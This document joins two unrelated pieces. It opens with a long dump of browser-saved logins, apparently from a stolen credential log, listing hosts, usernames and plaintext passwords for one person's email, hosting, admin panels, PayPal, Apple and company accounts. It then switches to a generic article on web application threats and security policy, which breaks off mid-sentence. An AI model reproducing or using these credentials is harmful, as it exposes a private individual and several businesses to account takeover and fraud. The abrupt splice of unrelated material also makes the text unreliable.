http://www.joomlart....s/downloads.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://test.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-group.com/de-home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://my.world4you.com/index.php Username: 50120485 Password: p9qk9g Application: Google Chrome Host: http://www.joomlacon...r.net/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://webmail.world4you.com/ Username: info@florianueberall.at Password: florian! Application: Google Chrome Host: http://omcme.forumotion.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.4freelance.de/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://crowdin.net/login Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://goomaxx-vorsc...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://yeslider.com/...rator/index.php Username: demo Password: demo Application: Google Chrome Host: http://localhost:8000/admin/ Username: chrioll Password: chrioll Application: Google Chrome Host: http://www.fonts.com...eb-fonts/google Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-acti...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz...ung-2013-a.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://www.highlands.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://kuler.adobe....te/color-wheel/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.gmop.de/administrator/ Username: cburger Password: Chris,123 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://192.168.178.3...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.tutorials...007-vba.281799/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73382697 Password: oliver3977lukas Application: Google Chrome Host: https://twitter.com/...word_reset_sent Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://support.bluep...t/scp/login.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://81.169.222.36/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://registrierun...Eukm2_q-GA_RGfc Username: grupomaximus Password: 8d16d57a3 Application: Google Chrome Host: http://seblod.time4m.../anmeldung.html Username: chrioll.b Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../showthread.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.panosfx.com/log-in/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://portal.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://mygully.com/t...enbuch-1825176/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db4 Password: GTtuENK Application: Google Chrome Host: http://i18n.osticket.com/join Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://saenger.bluep.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://ff.loc/scrum/ Username: luigi Password: mco727865 Application: Google Chrome Host: https://my.easyname.com/de/anmelden Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.magnolia...ia/admincentral Username: superuser Password: superuser Application: Google Chrome Host: http://www.bony-club.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: office Password: hitman47 Application: Google Chrome Host: http://sales.grupo-maximus.eu/ Username: office Password: romulus2014top Application: Google Chrome Host: https://app.asana.co...9605339434404/f Username: it-chris@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://edit.yahoo.com/upgrade Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-maximus.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://www.template...za.com/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://rubygems.org/sign_up Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ogram/index.php Username: admin Password: lz639ad Application: Google Chrome Host: ftp://e16927-ftp.services.easyname.eu/ Username: 9400ftp16 Password: Adrian,123 Application: Google Chrome Host: http://www.goomaxx.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verwaltung.bl...int-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bony.bluepoint-service.at/ Username: grupomaximus Password: klausi Application: Google Chrome Host: https://it.projektwe...7tfgcjm2hxn7rcd Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: christian Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: https://eu.battle.ne...eation/tos.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://app.cloudforge.com/session/new Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/ Username: grupomaximus Password: klausi Application: Google Chrome Host: http://www.klagusch-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://www.adobe.co...n.exchange.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://demo.f4s.eu/w...ce/content/demo Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: ftp://192.168.178.36/ Username: chrioll Password: chrioll Application: Google Chrome Host: https://servisto.de/...demo/login.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://twitter.com/oauth/authenticate Username: chrioll@gmail.com Password: mco727865 Application: Google Chrome Host: http://couponlisting...php/all-coupons Username: demo Password: demo Application: Google Chrome Host: https://www.xing.com...istian_Burger36 Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73459150 Password: hitman47 Application: Google Chrome Host: http://forum.admidio.org/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://pligg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-grou.../web/guest/home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.imapbuild...n/index-rc1.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.admidio.org/forum/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: admin Password: glockat Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.dolomiten...at/wp-login.php Username: griasenk Password: Sarese12! Application: Google Chrome Host: http://www.joomlaportal.de/login.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: author Password: author Application: Google Chrome Host: http://test2.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1..../create_account Username: chris@formfinder.at Password: Sarese12! Application: Google Chrome Host: http://www.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://goomaxx-vorsc....php/en/logout1 Username: cburger Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/ Username: cburger Password: malaga Application: Google Chrome Host: http://new.wasser-re.../administrator/ Username: admin Password: tempor Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: chris Password: Sarese12! Application: Google Chrome Host: http://192.168.1.1/ Username: admin Password: admin Application: Google Chrome Host: http://81.169.221.205/redmine/login Username: cburger Password: Sarese12!? Application: Google Chrome Host: http://ff.loc/scrum/index.php Username: chris Password: Sarese12! Application: Google Chrome Host: https://boerse.to/th...xisbuch.389380/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: https://www.evernote.com/Login.action Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz/ Username: chrioll Password: lz639ad Application: Google Chrome Host: http://goomaxx-vorsc...omponent/users/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.seblod.com/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.bang2joom.com/plan/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.owncloud.org/ Username: test Password: test Application: Google Chrome Host: http://activos-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ystem/login.php Username: admin Password: lz639ad Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: andreas Password: Glock19! Application: Google Chrome Host: http://goomaxx.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://github.com/session Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chriollweb@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: heico Password: hitman47 Application: Google Chrome Host: https://webmail.easyname.eu/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: http://pastebin.com/signup Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.foobla.c.../administrator/ Username: demo Password: demo Application: Google Chrome Host: https://www.dropbox.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.share-on....biz/user/login Username: 08088816435 Password: UqMsD3Fmb Application: Google Chrome Host: https://www.share-on...egister/premium Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: cburger Password: chris2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.goomaxx.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://ordasoft.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://owncloud.blue...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://idmsa.apple....Auth/login.html Username: chrioll65@me.com Password: Sarese12! Application: Google Chrome Host: http://office.bluepo...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://joomla35.ijoo...x.php/ad-agency Username: demo Password: demo Application: Google Chrome Host: http://www.nauticexp...096-216658.html Username: chris@wasser-rettung.net Password: Sarese12! Application: Google Chrome Host: http://wiki.bluepoin...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/register2/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.addthis.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://www.guia-culinaria.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://app.cloudfor...vitations/30847 Username: Burger Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: maximusgoomaxx@gmail.com Password: KZbDcf3G Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://introduction....ypo3.org/typo3/ Username: admin Password: password Application: Google Chrome Host: https://www.paypal.c...ebapps/mpp/home Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/phpmyadmin/ Username: root Password: chrioll Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/login.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/gottl/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://front.bluepoi...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/dbadmintool/ Username: grupo_maximus Password: 6Grewq7er Application: Google Chrome Host: https://communicator...com/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://www.deviantart.com/join/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.xing.com/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pixelio.de/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.boerse.bz...ele/index5.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://hsv.bluepoint...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://cloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...login_check.php Username: admin Password: lz639ad Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: http://elgg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.bootply.com/UIc6GLkWrb Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: superadmin Password: 987KdaE2 Application: Google Chrome Host: http://www.faboba.com/component/uu/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.schiessen...index.php/login Username: author Password: author Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: hans Password: hansmoser Application: Google Chrome Host: http://www.bluepoint.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://demo.kandanda.../administrator/ Username: demo Password: demo Application: Google Chrome Host: https://frontify.com/signup/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://blue.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://highlands-ost...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.yahoo.com/config/login Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://hsv1.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://www.odesk.com/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.guia-activos.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://www.goetzfri...om/template.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://jomclassified...orum/index.html Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...index.php/login Username: agent1 Password: agent1 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.dmxzone.c...free-extension/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...nstallation.php Username: admin Password: lz639ad Application: Google Chrome Host: http://www.sxc.hu/browse.phtml Username: chrioll Password: mco727865 Application: Google Chrome Host: http://demo.joombri.in/ Username: freelancer Password: password Application: Google Chrome Host: http://81.169.181.15.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.processon.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bootsnipp.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://open.bluepoint-service.at/ Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://demo.joomlacontenteditor.net/ Username: demo Password: demo Application: Google Chrome Host: http://www.w-b-s.net/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: http://webmail.binarydigit.at/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: https://communicator...com/ox6/ox.html Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://login.micros...e.com/login.srf Username: chris@formfinder.at Password: Sarese12!? Application: Google Chrome Host: https://www.joomlapolis.com/index.php Username: chrioll1965 Password: Sarese12! Application: Google Chrome Host: http://www.joomlacke...ead-more-button Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/install.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://www.yeedeen.c...in-registration Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.gfxtra1.net/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://culinaria-vor.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://owncloud.bony-club.eu/ Username: cburger Password: i&~8rN?2qpe( Application: Google Chrome Host: http://joomlacode.org/gf/account/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.bootply.com/CGj9cyTZwX Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://icomoon.io/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.stockphot...rfree.com/join/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://front.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/wp/...min/install.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: admin Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: desiree Password: Sarese12! Application: Google Chrome Host: https://www.dropbox.com/account Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: https://accounts.google.com/SignUp Username: mariavolperowain Password: MaRiA2014! Application: Google Chrome Host: http://www.seblod.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://t3.bluepoint-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://portal.bony-c.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../attachment.php Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.etengo.d...ojektliste.jspx Username: burger1 Password: Sarese12! Application: Google Chrome Host: https://www.xing.com...rian_Taciulescu Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.grupo-max...rator/index.php Username: 11631 Password: malaga Application: Google Chrome Host: http://forum.zhuk.cc...omponent/users/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.testlink...atest/login.php Username: admin Password: admin Application: Google Chrome Host: http://de.skill.gameforge.com/landing/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: editor Password: ffedit43 Application: Google Chrome Host: http://www.astemplates.com/signin Username: grupomaximus Password: 0zin3tS0 Application: Google Chrome Host: http://panopanda.co/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://webmail.wasser-rettung.net/ Username: chris@wasser-rettung.net Password: mco727865 Application: Google Chrome Host: http://open.bluepoin...anel/auth/login Username: chrioll@gmail.com Password: i41B4fo Application: Google Chrome Host: http://ordasoft.com/...sk,advregister/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.181.153/ Username: grupomaximus Password: ifnok5gfU0! Application: Google Chrome Host: https://login.skype.com/login Username: live:christian.b_17 Password: mco727865 Application: Google Chrome Host: http://jsfiddle.net/user/login/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://clicky.com/user/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.jomclass...index.php/login Username: demo Password: demo Application: Google Chrome Host: http://test2.bluepoi...gistration-form Username: hansi Password: 1234567890 Application: Google Chrome Host: http://helpdesk.blue...rvice.at/admin/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://developers.phpjunkyard.com/ Username: php Password: php Application: Google Chrome Host: http://oclass.bluepo...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/activate/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://bluepoint.blu.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://mygully.com/t...-1-3-a-2760461/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: admin Password: lz639ad Application: Google Chrome Host: http://sales.grupo-m...views/Anmelden/ Username: office Password: romulus2014top Application: Google Chrome Host: http://www.processon.com/signup/bind Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://85.214.78.91/.../administrator/ Username: admin Password: bony.club Application: Google Chrome Host: http://link.samsung.com/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: Cburger Password: chris2014 Application: Google Chrome Host: http://goomaxx.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost:8080/ Username: tomcat Password: s3cret Application: Google Chrome Host: http://www.xing.com/de Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.joomlic.c.../identification Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db7 Password: Sarese12! Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db6 Password: r2TlEv6 Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: hsv Password: 2014schiessen Application: Google Chrome Host: https://www.akeebaba...m/download.html Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.schiessen...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: https://store.steampowered.com/join/ Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: https://boerse.to/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: http://www.easyname.com/de Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://bitbucket.org/account/signin/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.psd-tutor...-oeffnen.93438/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://iface.ff.lan/user/login/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: c.burger@bony-club.eu Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: florian Password: florian2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://tibet.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://master-solut...cloudforge.com/ Username: cburger_bc Password: NqzwOWVGS8 Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://login.live.com/login.srf Username: christian.b@bluepoint-service.at Password: mco727865 Application: Google Chrome Host: http://iface.ff.lan/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://community.sp...com/login/login Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: https://webmail.easyname.com/ Username: 9400mail3 Password: sarese12 Application: Google Chrome Host: http://klagusch-sl.c...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas Application: Google Chrome Host: http://www.klagusch-...rator/index.php Username: Klaus - MAXiMUS Password: Oliver3977Lukas

Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-profile, getting more sophisticated, and increasing in frequency. According to the Gartner Group, 75 percent of cyber attacks and web security violations occur through Internet applications. Regardless of the development of the application being outsourced or in-house, adversaries examine the infrastructure of an application and its design to identify potential vulnerabilities that can be exploited. High-risk threats to web applications In particular, enterprises need to be aware of the following threats to web applications. The focus is on the wide repertoire of techniques adversaries use to compromise web applications and sites: DoS (Denial of Service): DoS attacks involve hackers overwhelming a web application with multiple requests for information, slowing down the operation of a website or entirely taking it down. A multi-source attack is considered a distributed DoS or DDoS, which routes the malicious traffic through a bigger number of servers. Attackers may also upload dangerous files, which may be downloaded by employees or processed in a corporate environment. Cross-site scripting (XSS): This is a common vulnerability that exploits web application weaknesses to attack users. The attack involves hackers passing data that’s crafted to masquerade legitimate functionality; without proper validation of data, malicious code is transferred to the web browser. In many cases, cyber criminals craft attacks via JavaScript, but attacks may also include Flash, HTML, or another code executed by web browsers. Cross-site scripting enable hackers to steal credentials, hijack sessions, or redirect users to malicious sites. SQL injection: These are random attacks that target applications with weak security to inject malware to extract data or aid virus distribution. These two scenarios are often a result of poor programming. Successful attacks involve hackers modifying the logic of SQL statements against databases. The application, in most cases, builds dynamic query statements, enabling malicious users to work with the data. Consequences can include data corruption, account compromise, or even a complete host takeover. Parameter & buffer manipulation: Websites often use URL parameters to pass information between web pages. Hackers can take advantage of this process and rewrite parameters in malicious ways. They may also manipulate buffers (a small storage allocated for data), andoverload them so that additional data overwrites data in other areas. Hackers may also override data with their own malicious code. Security policy template Security policies are, in effect, a strategy to protect web applications and ensure availability at all times. These generally include steps to identify responsibilities, predict threat vectors, and determine prevention & mitigation methodologies. It is essential to define rules for ensuring high availability of applications and minimizing weaknesses. Access and control mechanisms It is common for web applications to lack sufficient authorization checks for people attempting to access their resources. In a secure environment, there should be both role based and user access controls. Organizations should ensure that users can’t bypass ACLs by navigating directly to a file or page. This can be done by setting ACLs to default grant or deny access to authorized users and roles. The IT team can also utilize vetted frameworks and libraries. Access and control should be kept separate, and custom authorization routines should be avoided, as they make the authentication of all necessary channels more challenging. Delineation of responsibilities Never assume there are predefined responsibilities to access files and data stored by web applications. A lot of testing and experience goes into vetted frameworks, encryption algorithms and libraries, so make sure there is a clear description of responsibilities for every user at every possible step. The more default the set of responsibilities, the more difficult it will become to securing the application. Roles and access control are not just for developers, but for all people involved in using web applications. You need to have some delineation of roles with different levels of access for each user. While every organization’s application development program will be different, responsibilities can be handled in different ways or added in different places, and still be effective. Security resources and tools A well-defined policy template includes the use of encryption algorithm for web applications. Users have to determine the data that is valuable enough for encryption, and identify vulnerabilities through threat modeling. Some resources may have to be sacrificed to secure highly sensitive data. Implementations like a web application firewall will safeguard enterprise applications and websites from any cyber threat, so you can avoid costly downtime and data breach attacks. Enterprises are recommended to look for PCI-certified WAF as it protects against Cross-site scripting, SQL injections, and other threats. Some offerings include custom security rules that let you enforce security policies efficiently while eliminating false positives. New solutions are also using crowdsourcing techniques to protect applications with collective knowledge about the modern threat landscape. Threat information is aggregated using big data analytics. Disaster recovery and emergency mechanisms Disaster recovery solutions are required for immediate response to high-risk situations and mitigation strategies must be deployed to limit exposure from an attack. Disaster recovery should be allowed to bypass security assessments and address the risk before a proper assessment can be carried out. Patch releases, on the other hand, are subjected to appropriate level assessment based on the threats to the application architecture and/or functionality. CIOs are the personnel in charge of disaster recovery initiatives. Emergency mechanisms may include steps to take the application off-the-web or stop functionality release into the live environment if multiple threats increase the risk to unacceptable levels. Emergencies should be addressed in a point/patch release unless other mitigation strategies limit exposure. Credentials after patching may be temporarily stored outside of the webroot until the application infrastructure is tested in updated areas of the application environment. Other measures When web applications feature hard-coded credentials, the user can store credentials in the form of hashes to improve security in case the database or the configuration files get breached. Strict ACLs can also be deployed to protect credentials. Enterprises should also use a whitelist of acceptable input commands. If applications are configured to construct SQL queries, but include vulnerabilities that enable hackers to modify these queries, then it is beneficial to avoid dynamic queries, quote arguments, and special characters. The database inputs should be sanitized in general, and there should be strict rules for input validation. Compliance measures and business benefits When it comes to compliance, users who violate this policy should be subjected to a hearing, which may be concluded 